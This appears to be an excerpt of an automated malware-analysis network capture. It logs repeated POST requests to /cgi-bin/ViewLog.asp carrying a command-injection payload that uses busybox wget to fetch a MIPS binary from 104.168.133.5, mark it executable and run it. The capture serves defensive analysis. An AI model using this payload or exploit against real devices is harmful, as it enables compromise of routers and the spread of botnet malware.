                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              703192.168.2.134969094.131.59.1168080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:18:08.945795059 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:18:09.510174036 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:18:09.615773916 CET1314INHTTP/1.1 400 Bad Request
                                              Server: squid/6.0.0-20220501-re899e0c27
                                              Mime-Version: 1.0
                                              Date: Thu, 23 Nov 2023 04:18:09 GMT
                                              Content-Type: text/html;charset=utf-8
                                              Content-Length: 3572
                                              X-Squid-Error: ERR_INVALID_URL 0
                                              Vary: Accept-Language
                                              Content-Language: en
                                              Cache-Status: ezproxies.com
                                              Via: 1.1 ezproxies.com (squid/6.0.0-20220501-re899e0c27)
                                              Connection: close
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 32 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 20 0a 20 2f 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 32 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 0a 20 2a 0a 20 2a 20 53 71 75 69 64 20 73 6f 66 74 77 61 72 65 20 69 73 20 64 69 73 74 72 69 62 75 74 65 64 20 75 6e 64 65 72 20 47 50 4c 76 32 2b 20 6c 69 63 65 6e 73 65 20 61 6e 64 20 69 6e 63 6c 75 64 65 73 0a 20 2a 20 63 6f 6e 74 72 69 62 75 74 69 6f 6e 73 20 66 72 6f 6d 20 6e 75 6d 65 72 6f 75 73 20 69 6e 64 69 76 69 64 75 61 6c 73 20 61 6e 64 20 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 73 2e 0a 20 2a 20 50 6c 65 61 73 65 20 73 65 65 20 74 68 65 20 43 4f 50 59 49 4e 47 20 61 6e 64 20 43 4f 4e 54 52 49 42 55 54 4f 52 53 20 66 69 6c 65 73 20 66 6f 72 20 64 65 74 61 69 6c 73 2e 0a 20 2a 2f 0a 0a 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 65 72 64 61 6e 61 2c 20 73
                                              Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><meta type="copyright" content="Copyright (C) 1996-2022 The Squid Software Foundation and contributors"><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><title>ERROR: The requested URL could not be retrieved</title><style type="text/css">... /* * Copyright (C) 1996-2022 The Squid Software Foundation and contributors * * Squid software is distributed under GPLv2+ license and includes * contributions from numerous individuals and organizations. * Please see the COPYING and CONTRIBUTORS files for details. *//* Stylesheet for Squid Error pages Adapted from design by Free CSS Templates http://www.freecsstemplates.org Released for free under a Creative Commons Attribution 2.5 License*//* Page basics */* {font-family: verdana, s


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              704192.168.2.134964694.131.59.1168080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:18:08.953427076 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:18:09.060059071 CET1314INHTTP/1.1 400 Bad Request
                                              Server: squid/6.0.0-20220501-re899e0c27
                                              Mime-Version: 1.0
                                              Date: Thu, 23 Nov 2023 04:18:09 GMT
                                              Content-Type: text/html;charset=utf-8
                                              Content-Length: 3572
                                              X-Squid-Error: ERR_INVALID_URL 0
                                              Vary: Accept-Language
                                              Content-Language: en
                                              Cache-Status: ezproxies.com
                                              Via: 1.1 ezproxies.com (squid/6.0.0-20220501-re899e0c27)
                                              Connection: close
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 32 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 20 0a 20 2f 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 32 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 0a 20 2a 0a 20 2a 20 53 71 75 69 64 20 73 6f 66 74 77 61 72 65 20 69 73 20 64 69 73 74 72 69 62 75 74 65 64 20 75 6e 64 65 72 20 47 50 4c 76 32 2b 20 6c 69 63 65 6e 73 65 20 61 6e 64 20 69 6e 63 6c 75 64 65 73 0a 20 2a 20 63 6f 6e 74 72 69 62 75 74 69 6f 6e 73 20 66 72 6f 6d 20 6e 75 6d 65 72 6f 75 73 20 69 6e 64 69 76 69 64 75 61 6c 73 20 61 6e 64 20 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 73 2e 0a 20 2a 20 50 6c 65 61 73 65 20 73 65 65 20 74 68 65 20 43 4f 50 59 49 4e 47 20 61 6e 64 20 43 4f 4e 54 52 49 42 55 54 4f 52 53 20 66 69 6c 65 73 20 66 6f 72 20 64 65 74 61 69 6c 73 2e 0a 20 2a 2f 0a 0a 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 65 72 64 61 6e 61 2c 20 73
                                              Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><meta type="copyright" content="Copyright (C) 1996-2022 The Squid Software Foundation and contributors"><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><title>ERROR: The requested URL could not be retrieved</title><style type="text/css">... /* * Copyright (C) 1996-2022 The Squid Software Foundation and contributors * * Squid software is distributed under GPLv2+ license and includes * contributions from numerous individuals and organizations. * Please see the COPYING and CONTRIBUTORS files for details. *//* Stylesheet for Squid Error pages Adapted from design by Free CSS Templates http://www.freecsstemplates.org Released for free under a Creative Commons Attribution 2.5 License*//* Page basics */* {font-family: verdana, s


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              705192.168.2.133865631.136.190.658080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:18:09.021404982 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:18:09.606180906 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:18:10.726166964 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:18:13.158174038 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:18:17.766175032 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              706192.168.2.135976431.136.156.1478080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:18:09.021456003 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:18:09.606180906 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:18:10.726166964 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:18:13.158174038 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:18:17.766175032 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              707192.168.2.135111494.107.213.2058080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:18:09.022973061 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:18:09.207915068 CET567INHTTP/1.1 400 Bad Request
                                              Content-Type: text/html; charset=us-ascii
                                              Server: Microsoft-HTTPAPI/2.0
                                              Date: Thu, 23 Nov 2023 04:18:09 GMT
                                              Connection: close
                                              Content-Length: 334
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 42 61 64 20 52 65 71 75 65 73 74 20 2d 20 49 6e 76 61 6c 69 64 20 48 6f 73 74 6e 61 6d 65 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 30 2e 20 54 68 65 20 72 65 71 75 65 73 74 20 68 6f 73 74 6e 61 6d 65 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Bad Request</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Bad Request - Invalid Hostname</h2><hr><p>HTTP Error 400. The request hostname is invalid.</p></BODY></HTML>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              708192.168.2.134585631.184.209.198080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:18:09.033139944 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:18:09.227983952 CET544INHTTP/1.1 400 Bad Request
                                              Content-Type: text/html; charset=us-ascii
                                              Server: Microsoft-HTTPAPI/2.0
